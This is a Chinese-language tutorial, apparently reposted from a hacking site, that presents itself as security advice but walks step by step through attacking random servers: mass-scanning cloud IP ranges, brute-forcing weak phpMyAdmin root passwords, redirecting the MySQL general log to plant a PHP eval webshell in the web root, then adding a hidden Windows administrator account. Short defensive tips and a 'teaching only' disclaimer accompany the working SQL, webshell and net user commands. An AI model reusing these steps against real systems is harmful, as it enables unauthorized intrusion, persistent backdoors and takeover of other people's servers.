以前服務器老是本人黑,千瘡百孔,只能一步步的去作一些安全防範,如何防範天然先從如何滲透開始.php
前段時間看到了個phpmyadmin提權的教程,不少人都說如今那裏還有root賬號root密碼這種弱口令,今天給你們來一套完整的教學。html
首先百度XX雲X地區的IP段(你要是連幾個國內雲服務運營商的名字都不知道,那我就真的沒辦法了)。mysql
找到之後百度隨便找個工具掃描IP段,大的運營商通常直接後兩個大段都是他的git
而後找到IP段之後直接找一個80端口批量掃描的工具掃80端口,直接掃兩個大段github
我用的這個叫S-Xing,百度來的,不知道有沒有後門,因此就不提供了sql
掃描好之後導入剛纔掃描好的IP數據庫
而後選擇自動後綴安全
線程根據本身配置來配置,我直接選擇最高500,而後開始爆破服務器
爆破結果工具
防範建議 這裏的話,想要防範這一步,能夠採起的方法有關閉phpMyAdmin,這個最直接了. 若是不關閉的話,建議更改訪問的端口號. 而後默認密碼必須修改,不可使用簡單密碼. 目錄的權限也最好降低到最低.
隨便選擇一個開搞
先看一下服務器信息xx.xx.xx.xx/l.php
網站路徑什麼的都爆出來了,登陸後臺
老規矩,查下mysql日誌文件路徑
先修改日誌路徑到當前網站路徑,在開啓日誌,並插入一句話木馬,而後關閉日誌
SET global general_log_file='C:/phpStudy/PHPTutorial/WWW/sean.php';
修改當前日誌文件到網站目錄下
set global general_log = "ON"; 開啓mysql記錄日誌
select '<?php eval($_POST[sean]);?>'; 插入PHP 一句話木馬
set global general_log = "OFF"; 關閉mysql記錄日誌
執行成功
接下來上菜刀鏈接上傳好的一句話木馬
用net user admin$ sean2018.. /add & net localgroup administrators admin$ /add
建立一個管理員帳號
帳號已存在,那就直接修改密碼了,帶$符號的都是被影藏帳號,估計被日了多少次了吧
接下來鏈接試試
防範建議 在這一步的話,防範的方法也有一些,比方說加一個安全狗軟件,算是不錯的了. 至於寫文件的這個權限,剛剛若是下降了,應該問題不大,不過也有能夠提高權限的一些工具,所以須要及時更新數據庫和系統的bug. 至於執行命令建立用戶的權限,只能簡單作好預防和按期查看了,基本上到了上一步,全部的權限和帳戶已經有了.到了這裏目前只有重裝系統,才能幹掉這個入侵者的份了. 固然,若是把全部的漏洞堵上,也能夠不重裝.可是後門太多,非專業人員,處理不會怎麼全面.
玩完,收工,文章內全部的工具,百度一搜索一大把,我也是百度來的,不知道有沒有後門因此就不提供下載了,怕中毒找個虛擬機搞,本身折騰吧。
華盟網原創,隨便轉載但請註明來自77169.COM,感謝支持!
本文章只作教學思路,請勿用於非法用途
20180806 開始着手文章
20180807 文章完成時間